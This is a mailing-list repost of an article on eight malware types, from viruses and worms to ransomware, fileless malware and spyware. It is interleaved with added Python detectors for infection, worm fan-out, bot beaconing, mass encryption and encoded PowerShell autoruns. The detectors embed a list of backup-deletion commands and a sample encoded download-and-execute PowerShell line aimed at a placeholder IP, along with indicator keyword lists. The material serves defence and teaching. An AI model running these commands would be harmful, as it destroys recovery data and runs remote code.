[BreachExchange] 8 types of malware and how to recognize them

Destry Winant destry at riskbasedsecurity.com
Tue Jul 24 22:21:05 EDT 2018


https://www.csoonline.com/article/2615925/security/security-your-quick-guide-to-malware-types.html#tk.rss_news

People tend to play fast and loose with security terminology. However,
it's important to get your malware classifications straight because
knowing how various types of malware spread is vital to containing and
removing them.

This concise malware bestiary will help you get your malware terms
right when you hang out with geeks.

1. Viruses

A computer virus is what most of the media and regular end-users call
every malware program reported in the news. Fortunately, most malware
programs aren't viruses. A computer virus modifies other legitimate
host files (or pointers to them) in such a way that when a victim's
file is executed, the virus is also executed.

Pure computer viruses are uncommon today, comprising less than 10
percent of all malware. That's a good thing: Viruses are the only type
of malware that "infects" other files. That makes them particularly
hard to clean up because the malicious code must be removed from the
legitimate host file without breaking it. This has always been
nontrivial, and today it's almost impossible. The best antivirus
programs struggle with doing it correctly and in many (if not most)
cases will simply quarantine or delete the infected file instead.
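Because a virus changes the bytes of legitimate host files, the practical way to spot one without disassembling anything is file-integrity monitoring: hash every executable while the system is known clean, then look for files whose hash changed. The following is an added example, not code from the article; the directory, file names, placeholder "program" bodies and the appended payload are all constructed for the demonstration.

```python
"""File-integrity check for catching a file infector: hash every file while
the system is known clean, then report hosts whose bytes changed. Added
example; the directory, file names and contents are constructed."""
import hashlib
import os
import tempfile

def sha256_of(path: str) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()

def baseline(root: str) -> dict:
    """Map each regular file under root (relative path) to (size, sha256)."""
    result = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            p = os.path.join(dirpath, name)
            result[os.path.relpath(p, root)] = (os.path.getsize(p), sha256_of(p))
    return result

def diff_against_baseline(root: str, base: dict) -> dict:
    """Compare the tree to a stored baseline. A virus shows up under
    'modified' (host file changed), a dropped component under 'added'."""
    now = baseline(root)
    return {
        "modified": sorted(k for k in base if k in now and now[k] != base[k]),
        "added": sorted(k for k in now if k not in base),
        "removed": sorted(k for k in base if k not in now),
    }

def simulate_host_modification(host_path: str, payload: bytes) -> None:
    """Stand-in for an appending infector: the original bytes stay in place
    so the program still runs, and extra code is tacked onto the end."""
    with open(host_path, "ab") as f:
        f.write(payload)

def demo() -> dict:
    """Baseline three constructed files, 'infect' one, drop a new one, then diff."""
    with tempfile.TemporaryDirectory() as root:
        for name in ("calc.exe", "notepad.exe", "readme.txt"):
            with open(os.path.join(root, name), "wb") as f:
                f.write(b"MZ placeholder body for " + name.encode())  # not a real PE
        base = baseline(root)
        simulate_host_modification(os.path.join(root, "calc.exe"), b"\x90" * 64 + b"APPENDED")
        with open(os.path.join(root, "dropper.exe"), "wb") as f:
            f.write(b"MZ placeholder dropped component")
        return diff_against_baseline(root, base)

if __name__ == "__main__":
    print(demo())
```

The baseline has to be taken and stored somewhere the malware cannot reach (read-only media or a separate host), otherwise an infector that runs with the same privileges can simply rewrite it.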

2. Worms

Worms have been around even longer than computer viruses, all the way
back to mainframe days. Email brought them into fashion in the late
1990s, and for nearly a decade, computer security pros were besieged
by malicious worms that arrived as message attachments. One person
would open a wormed email and the entire company would be infected in
short order.

The distinctive trait of the worm is that it's self-replicating. Take
the notorious Iloveyou worm: When it went off, it hit nearly every
email user in the world, overloaded phone systems (with fraudulently
sent texts), brought down television networks, and even delayed my
daily afternoon paper for half a day. Several other worms, including
SQL Slammer and MS Blaster, ensured the worm's place in computer
security history.

What makes an effective worm so devastating is its ability to spread
without end-user action. Viruses, by contrast, require that an
end-user at least kick them off before they can try to infect other
innocent files and users. Worms exploit other files and programs to do
the dirty work. For example, the SQL Slammer worm used a vulnerability
in Microsoft SQL Server (for which a patch had been available for
months) to trigger a buffer overflow on nearly every unpatched SQL
server connected to the internet in about 10 minutes; the entire worm
fit in a single UDP packet to port 1434. That is a speed record that
still stands today.

3. Trojans

Computer worms have been replaced by Trojan horse malware programs as
the weapon of choice for hackers. Trojans masquerade as legitimate
programs, but they contain malicious instructions. They've been around
forever, even longer than computer viruses, and today they compromise
more computers than any other type of malware.

A Trojan must be executed by its victim to do its work. Trojans
usually arrive via email or are pushed on users when they visit
infected websites. The most popular Trojan type is the fake antivirus
program, which pops up and claims you're infected, then instructs you
to run a program to clean your PC. Users swallow the bait and the
Trojan takes root.

Trojans are hard to defend against for two reasons: They're easy to
write (cyber criminals routinely produce and hawk Trojan-building
kits) and spread by tricking end-users — which a patch, firewall, and
other traditional defense cannot stop. Malware writers pump out
Trojans by the millions each month. Antimalware vendors try their best
to fight Trojans, but there are too many new samples for
signature-based detection to keep up with.

4. Hybrids and exotic forms

Today, most malware is a combination of traditional malicious
programs, often including parts of Trojans and worms and occasionally
a virus. Usually the malware program appears to the end-user as a
Trojan, but once executed, it attacks other victims over the network
like a worm.

Many of today's malware programs are considered rootkits or stealth
programs: they modify the underlying operating system to take ultimate
control and hide from antimalware programs. To get rid of these types
of programs, you must first remove the controlling component from
memory; only then can an antimalware scan find and clean the rest.

Bots are essentially Trojan/worm combinations that attempt to make
individual exploited clients a part of a larger malicious network.
Botmasters have one or more "command and control" servers that bot
clients check into to receive their updated instructions. Botnets
range in size from a few thousand compromised computers to huge
networks with hundreds of thousands of systems under the control of a
single botnet master. These botnets are often rented out to other
criminals who then use them for their own nefarious purposes.
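Both traits just described, a worm's fan-out and a bot's check-ins, show up in network flow records. As an added example (not from the article), the Python below builds a constructed set of flows and flags (1) any source that reaches many distinct destinations on one port within seconds, which is what Slammer's single-packet UDP/1434 traffic looked like, and (2) any source/destination pair whose connection intervals are too regular to be a human, which is what a bot checking in with its command and control server looks like. All IP addresses are from documentation ranges, and the thresholds are assumptions to tune per environment.

```python
"""Two network-side signals over constructed flow records (example code, not
from the article): a worm's fan-out to many targets on one port in seconds,
and a bot's regular check-ins to a command and control server."""
import statistics
from collections import defaultdict

# Constructed flow records: (timestamp_seconds, src_ip, dst_ip, proto, dst_port)
def build_sample_flows():
    flows = []
    # Worm-like: one host hits 250 distinct targets on UDP/1434 in ~5 seconds.
    for i in range(250):
        flows.append((1000.0 + i * 0.02, "10.0.0.5", f"198.51.100.{i + 1}", "udp", 1434))
    # Bot-like: one host calls the same external IP every ~60 s with a couple
    # of seconds of jitter, 30 times.
    for k in range(30):
        jitter = ((k * 7) % 5) - 2
        flows.append((2000.0 + 60 * k + jitter, "10.0.0.7", "203.0.113.10", "tcp", 443))
    # Ordinary user: repeat visits to one site at irregular gaps, plus one-offs.
    t = 3000.0
    for gap in (3, 47, 120, 9, 400, 33, 75, 600, 5, 20, 250, 8, 90, 15):
        t += gap
        flows.append((t, "10.0.0.8", "192.0.2.50", "tcp", 443))
    for i, host in enumerate(("192.0.2.10", "192.0.2.20", "192.0.2.30")):
        flows.append((3100.0 + 17 * i, "10.0.0.8", host, "tcp", 80))
    return flows

def detect_fanout(flows, window=10.0, min_targets=100):
    """Return {(src, proto, port): peak_distinct_destinations} for sources that
    reached at least min_targets distinct destinations inside `window` seconds."""
    by_key = defaultdict(list)
    for ts, src, dst, proto, dport in flows:
        by_key[(src, proto, dport)].append((ts, dst))
    hits = {}
    for key, events in by_key.items():
        events.sort()
        in_window = defaultdict(int)  # destination -> count inside the sliding window
        start = 0
        for ts, dst in events:
            in_window[dst] += 1
            while events[start][0] < ts - window:  # evict events older than the window
                old = events[start][1]
                in_window[old] -= 1
                if in_window[old] == 0:
                    del in_window[old]
                start += 1
            if len(in_window) >= min_targets:
                hits[key] = max(hits.get(key, 0), len(in_window))
    return hits

def detect_beacons(flows, min_connections=10, max_cv=0.1):
    """Return {(src, dst, port): stats} for pairs whose inter-connection gaps are
    suspiciously regular: coefficient of variation (stdev / mean) below max_cv."""
    by_pair = defaultdict(list)
    for ts, src, dst, proto, dport in flows:
        by_pair[(src, dst, dport)].append(ts)
    hits = {}
    for pair, times in by_pair.items():
        if len(times) < min_connections:
            continue
        times.sort()
        gaps = [b - a for a, b in zip(times, times[1:])]
        mean = statistics.fmean(gaps)
        if mean <= 0:
            continue
        cv = statistics.pstdev(gaps) / mean
        if cv < max_cv:
            hits[pair] = {"count": len(times), "interval": round(mean, 1), "cv": round(cv, 3)}
    return hits

FLOWS = build_sample_flows()

if __name__ == "__main__":
    print("fan-out:", detect_fanout(FLOWS))
    print("beacons:", detect_beacons(FLOWS))
```

Real bots add jitter precisely to defeat the second check, so in practice the coefficient-of-variation threshold is loosened and combined with other features (fixed request sizes, a destination nobody else in the organization talks to); the fan-out check is robust because a worm cannot spread quickly without touching many hosts.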

5. Ransomware

Malware programs that encrypt your data and hold it hostage waiting
for a cryptocurrency payoff have made up a huge percentage of the
malware for the last few years, and the percentage is still growing.
Ransomware has often crippled companies, hospitals, police
departments, and even entire cities.

Most ransomware programs are Trojans, which means they must be spread
through social engineering of some sort. Once executed, most look for
and encrypt users’ files within a few minutes, although a few are now
taking a “wait-and-see” approach. By watching the user for a few hours
before setting off the encryption routine, the attacker can figure out
exactly how much ransom the victim can afford and also make sure to
delete or encrypt backups the victim assumed were safe.

Ransomware can be prevented just like every other type of malware
program, but once executed, it can be hard to reverse the damage
without a good, validated backup. According to some studies, about a
quarter of the victims pay the ransom, and of those, about 30 percent
still do not get their files unlocked. Either way, unlocking the
encrypted files, if even possible, takes particular tools, decryption
keys and more than a bit of luck. The best advice is to make sure you
have a good, offline backup of all critical files.
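The two ransomware behaviours described above, mass encryption of user files and the destruction of local backups beforehand, are both detectable on the host. The Python below is an added example, not from the article: it runs over constructed file-write events and command lines, flags a process that rewrites many files as high-entropy data within a short window, and matches the backup-destruction commands (vssadmin, wmic, wbadmin, bcdedit) that ransomware families commonly run. The "ciphertext" is produced by an XOR keystream stand-in so the sample is deterministic; the process names, paths and thresholds are assumptions.

```python
"""Host-side ransomware signals over constructed file-write events and command
lines (example code, not from the article): many files rewritten as
high-entropy data by one process in a short window, and the backup-tampering
commands that often precede encryption."""
import hashlib
import math
from collections import defaultdict

def shannon_entropy(data: bytes) -> float:
    """Entropy in bits per byte: roughly 4-5 for English text, near 8 for ciphertext."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)

def pseudo_ciphertext(plaintext: bytes, key: bytes) -> bytes:
    """XOR with a SHA-256 counter keystream: a deterministic stand-in that
    yields ciphertext-like bytes for the sample, not a cipher to use."""
    out = bytearray()
    block = 0
    while len(out) < len(plaintext):
        out += hashlib.sha256(key + block.to_bytes(4, "big")).digest()
        block += 1
    return bytes(p ^ k for p, k in zip(plaintext, out))

SAMPLE_DOC = b"Quarterly report. Revenue grew in all regions. " * 40

def build_sample_events():
    """Constructed write events: (timestamp, pid, process, path, bytes_written)."""
    events = []
    for i in range(3):  # benign: a user saving a text document a few times
        events.append((100.0 + 30 * i, 1200, "winword.exe",
                       "C:/Users/ann/Documents/report.docx", SAMPLE_DOC + b"\n" * i))
    # benign: one archive from the backup agent (high entropy, but a single file)
    events.append((200.0, 1300, "backup.exe", "C:/Backups/weekly.zip",
                   pseudo_ciphertext(SAMPLE_DOC, b"zip-like")))
    for i in range(40):  # malicious: 40 user files rewritten as ciphertext in 20 seconds
        path = f"C:/Users/ann/Documents/file{i:02d}.docx.locked"
        events.append((300.0 + i * 0.5, 4444, "update.exe", path,
                       pseudo_ciphertext(SAMPLE_DOC + str(i).encode(), b"ransom-key")))
    return events

def detect_mass_encryption(events, window=60.0, min_files=20, min_entropy=7.0):
    """Return {(pid, process): distinct_files} for processes that wrote at least
    min_files distinct high-entropy files inside any `window`-second span."""
    by_proc = defaultdict(list)
    for ts, pid, proc, path, data in events:
        if shannon_entropy(data) >= min_entropy:
            by_proc[(pid, proc)].append((ts, path))
    hits = {}
    for key, writes in by_proc.items():
        writes.sort()
        start = 0
        for end in range(len(writes)):
            while writes[end][0] - writes[start][0] > window:
                start += 1
            distinct = {p for _, p in writes[start:end + 1]}
            if len(distinct) >= min_files:
                hits[key] = max(hits.get(key, 0), len(distinct))
    return hits

# Commands ransomware families commonly run to destroy local recovery options.
BACKUP_TAMPERING = (
    "vssadmin delete shadows",
    "wmic shadowcopy delete",
    "wbadmin delete catalog",
    "bcdedit /set {default} recoveryenabled no",
)

def detect_backup_tampering(command_lines):
    """Return the command lines that match a known backup-destruction pattern."""
    flagged = []
    for line in command_lines:
        norm = " ".join(line.lower().split())  # case- and whitespace-insensitive
        if any(pattern in norm for pattern in BACKUP_TAMPERING):
            flagged.append(line)
    return flagged

EVENTS = build_sample_events()
SAMPLE_COMMANDS = [  # constructed
    "vssadmin  Delete Shadows /All /Quiet",
    "wbadmin delete catalog -quiet",
    "vssadmin list shadows",
    "notepad.exe C:\\Users\\ann\\notes.txt",
]

if __name__ == "__main__":
    print(detect_mass_encryption(EVENTS))
    print(detect_backup_tampering(SAMPLE_COMMANDS))
```

The entropy check alone would also fire on a backup or archiving tool, which is why the detection counts distinct files per process per window rather than flagging any single high-entropy write; the backup-tampering match is the higher-fidelity signal and, in a "wait-and-see" intrusion, often the last chance to act before encryption starts.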

6. Fileless malware

Fileless malware isn’t really a different category of malware, but
more a description of how it gets in and persists. Traditional
malware travels and infects new systems using the file system.
Fileless malware, which today comprises over 50 percent of all malware
and growing, is malware that doesn’t directly use files or the file
system. Instead it exploits and spreads in memory only or using other
“non-file” OS objects such as registry keys, APIs or scheduled tasks.

Many fileless attacks begin by exploiting a legitimate program that is
already running and spawning a new child process from it, or by using
legitimate tools built into the OS (like Microsoft’s PowerShell). The
end result is that fileless attacks are harder to detect and stop. If
you aren’t already very familiar with common fileless attack
techniques and programs, you probably should be if you want a career
in computer security.
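A concrete instance of the pattern above is a registry Run value or scheduled task whose only artifact on disk is a launcher line such as `powershell.exe -nop -w hidden -enc <base64>`; the payload lives in the encoded argument and is pulled into memory at run time. The Python below is an added example, not from the article: it decodes PowerShell's -EncodedCommand argument (base64 over UTF-16LE, which is what PowerShell expects), strips the blob out of the visible command line so its random letters cannot produce false matches, and scans both the launcher and the decoded script for indicators. The autorun entries are constructed, and the indicator list is an assumption to extend.

```python
"""Inspecting autorun entries for the fileless pattern the text describes: a
registry Run value or scheduled task that launches PowerShell with an encoded
command and nothing else on disk. Example code, not from the article; all
entries below are constructed."""
import base64
import re

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
ENC_RE = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)

# Substrings that warrant a second look in a launcher line or decoded script.
SUSPICIOUS = ("iex", "invoke-expression", "downloadstring", "frombase64string",
              "-nop", "-w hidden", "bypass", "reflection.assembly")

def encode_powershell(script: str) -> str:
    """What -EncodedCommand takes: base64 of the UTF-16LE encoded script."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

def decode_encoded_command(cmdline: str):
    """Return the decoded script if cmdline carries an encoded command, else None."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def score_launcher(cmdline: str) -> dict:
    """Decode any encoded payload, then look for indicators in the visible
    command line (with the base64 blob replaced, so its random letters cannot
    match an indicator) and in the decoded script."""
    decoded = decode_encoded_command(cmdline)
    visible = ENC_RE.sub("-EncodedCommand <decoded>", cmdline)
    text = (visible + " " + (decoded or "")).lower()
    return {"decoded": decoded, "indicators": [s for s in SUSPICIOUS if s in text]}

def scan_autoruns(entries):
    """entries: iterable of (location, command). Returns {location: indicators}
    for every entry with at least one indicator."""
    findings = {}
    for location, command in entries:
        result = score_launcher(command)
        if result["indicators"]:
            findings[location] = result["indicators"]
    return findings

SAMPLE_AUTORUNS = [  # constructed
    (r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive",
     r"C:\Users\ann\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background"),
    (r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     "powershell.exe -nop -w hidden -enc " + encode_powershell(
         "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/a.ps1')")),
    (r"Task Scheduler\Microsoft\Windows\Maint",
     r"powershell.exe -ExecutionPolicy Bypass -File C:\ProgramData\m.ps1"),
]

if __name__ == "__main__":
    for loc, inds in scan_autoruns(SAMPLE_AUTORUNS).items():
        print(loc, "->", inds)
```

The same decoding step is what makes PowerShell's own script block logging (event ID 4104) so valuable: it records the script after decoding, so the download-and-execute one-liner above appears in the log in clear text even though it never touched disk.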

7. Adware

If you're lucky, the only malware program you've come in contact with
is adware, which attempts to expose the compromised end-user to
unwanted, potentially malicious advertising. A common adware program
might redirect a user's browser searches to look-alike web pages that
contain other product promotions.

8. Spyware

Spyware is most often used by people who want to check on the computer
activities of loved ones. Of course, in targeted attacks, criminals
can use spyware to log the keystrokes of victims and gain access to
passwords or intellectual property.

Adware and spyware programs are usually the easiest to remove, often
because they aren't nearly as nefarious in their intentions as other
types of malware. Find the malicious executable and prevent it from
being executed — you're done.

A much bigger concern than the actual adware or spyware is the
mechanism it used to exploit the computer or user, be it social
engineering, unpatched software, or a dozen other root exploit causes.
This is because although a spyware or adware program’s intentions are
not as malicious, as say, a backdoor remote access trojan, they both
use the same methods to break in. The presence of an adware/spyware
program should serve as a warning that the device or user has some
sort of weakness that needs to be corrected, before real badness comes
calling.

Finding and removing malware

Today, many malware programs start out as a Trojan or worm, but then
dial home to a botnet and let human attackers into the victim's
computer and network. Many advanced persistent threat (APT) attacks
start out this way: They use Trojans to gain the initial foothold into
hundreds or thousands of companies, while the human attackers lurk, in
search of interesting intellectual property. The vast majority of
malware exists to steal money — directly out of a bank account or
indirectly by stealing passwords or identities.

If you're lucky, you can find malicious executables using a program
like Microsoft's Autoruns, Microsoft’s Process Explorer, or Silent
Runners. If the malware program is stealthy, you'll have to remove the
hiding component from memory first (if possible), then work on
extricating the rest of the program. Often, I'll boot Microsoft
Windows into Safe Mode or through another method, remove the suspected
stealth component (sometimes by just renaming it), and run a good
antivirus scanner a few times to clean up the remainders after the
stealth part is removed.

Unfortunately, finding and removing individual malware program
components can be a fool's errand. It's easy to get it wrong and miss
a component. Plus, you don't know whether the malware program has
modified the system in such a way that it will be impossible to make
it completely trustworthy again.

Unless you're well trained in malware removal and forensics, back up
the data (if needed), format the drive, and reinstall the programs and
data when you find malware on a computer. Patch it well and make sure
end-users know what they did wrong. That way, you get a trustworthy
computer platform and move ahead in the fight without any lingering
risks or questions.


More information about the BreachExchange mailing list